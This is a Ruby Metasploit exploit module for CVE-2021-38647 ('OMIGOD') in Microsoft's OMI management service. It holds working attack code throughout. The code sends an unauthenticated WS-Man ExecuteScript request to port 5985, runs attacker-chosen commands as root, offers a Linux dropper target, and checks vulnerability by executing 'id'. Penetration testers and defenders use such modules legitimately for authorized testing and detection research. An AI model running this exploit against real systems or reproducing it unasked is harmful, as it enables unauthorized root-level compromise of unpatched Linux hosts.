Path: blob/master/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
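##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Namespace map for the XPath queries in #parse_response. The response body
  # carries the ExecuteScript output under the SCX_OperatingSystem schema, so
  # the `p` prefix is bound to that URI here.
  XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft OMI Management Interface Authentication Bypass',
        'Description' => %q{
          By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint
          that will cause it to execute an operating system command as the root user. This vulnerability was patched in
          OMI version 1.6.8-1 (released September 8th 2021).
        },
        'Author' => [
          'Nir Ohfeld', # vulnerability discovery & research
          'Shir Tamari', # vulnerability discovery & research
          'Spencer McIntyre', # metasploit module
          'wvu' # vulnerability research
        ],
        'References' => [
          ['CVE', '2021-38647'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],
          ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],
          ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],
          ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']
        ],
        'DisclosureDate' => '2021-09-14',
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'RPORT' => 5985,
          'SSL' => false,
          'MeterpreterTryToFork' => true
        },
        'Notes' => {
          'AKA' => ['OMIGOD'],
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # Every request is an unauthenticated POST to TARGETURI; the service
          # logs are the primary place a defender will see this.
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/wsman'])
    ])
  end

  # Runs `id` through the endpoint and decides the check result from the
  # HTTP status and the StdOut field of the parsed response.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no usable response came
  #   back, Safe on a non-200 status, Vulnerable when a uid was echoed.
  def check
    http_res = send_command('id')
    return CheckCode::Unknown if http_res.nil?
    return CheckCode::Safe unless http_res.code == 200

    cmd_res = parse_response(http_res, 'id')
    return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /

    # Regexp.last_match(1) is the uid captured by the match on the line above.
    CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")
  end

  # Dispatches on the selected target type: runs the encoded payload as a
  # single command, or hands off to the CmdStager mixin for the dropper.
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      result = execute_command(payload.encoded)
      if result
        print_status(result[:stdout]) unless result[:stdout].blank?
        print_error(result[:stderr]) unless result[:stderr].blank?
      end
    when :linux_dropper
      execute_cmdstager
    end
  end

  # Sends one command and returns its parsed output. Also used as the
  # CmdStager callback, hence the unused options parameter.
  #
  # @param cmd [String] command to run
  # @param _opts [Hash] ignored; present for CmdStager's calling convention
  # @return [Hash, nil] see #parse_response
  # @raise [Msf::Exploit::Failed] via fail_with when no 200 response is received
  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")
    res = send_command(cmd)

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
    end

    parse_response(res, cmd)
  end

  # Extracts ReturnCode, StdOut and StdErr from the SOAP response.
  #
  # The original version referenced an undefined `cmd` local in the error
  # message, which raised NameError whenever ReturnCode was non-zero; the
  # command is now an optional parameter so existing single-argument callers
  # keep working.
  #
  # @param res [Rex::Proto::Http::Response, nil] HTTP response to parse
  # @param cmd [String, nil] command the response belongs to, for the error message
  # @return [Hash, nil] keys :return_code (Integer), :stdout and :stderr
  #   (String or nil); nil when there is no 200 response to parse
  def parse_response(res, cmd = nil)
    return nil unless res&.code == 200

    # Parse once instead of re-reading the body for each field.
    doc = res.get_xml_document
    # NOTE: nil.to_i is 0, so a response with no ReturnCode element reads as
    # success here; callers confirm execution from :stdout rather than this value.
    return_code = doc.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
    unless return_code == 0
      label = cmd ? ": #{cmd}" : ''
      print_error("Failed to execute command#{label} (status: #{return_code})")
    end

    {
      return_code: return_code,
      stdout: doc.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
      stderr: doc.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
    }
  end

  # Posts a WS-Man ExecuteScript envelope to TARGETURI without any
  # Authorization header; the unpatched service accepts it as-is. The command
  # is base64-encoded into the Script element, so the interpolated value
  # contains only base64 characters and cannot break the XML. The envelope is
  # round-tripped through Nokogiri with NOBLANKS so the heredoc's whitespace
  # does not reach the wire.
  #
  # @param cmd [String] command to run
  # @return [Rex::Proto::Http::Response, nil] the raw HTTP response, or nil on
  #   a transport failure
  def send_command(cmd)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'ctype' => 'text/xml;charset=UTF-8',
      'data' => Nokogiri::XML(<<~ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
        <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
          <s:Header>
            <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>
            <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
            <a:ReplyTo>
              <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
            </a:ReplyTo>
            <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
            <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
            <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>
            <w:OperationTimeout>PT1M30S</w:OperationTimeout>
            <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
            <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
            <w:OptionSet s:mustUnderstand="true"/>
            <w:SelectorSet>
              <w:Selector Name="__cimnamespace">root/scx</w:Selector>
            </w:SelectorSet>
          </s:Header>
          <s:Body>
            <p:ExecuteScript_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
              <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>
              <p:Arguments/>
              <p:timeout>0</p:timeout>
              <p:b64encoded>true</p:b64encoded>
            </p:ExecuteScript_INPUT>
          </s:Body>
        </s:Envelope>
      ENVELOPE
    )
  end
end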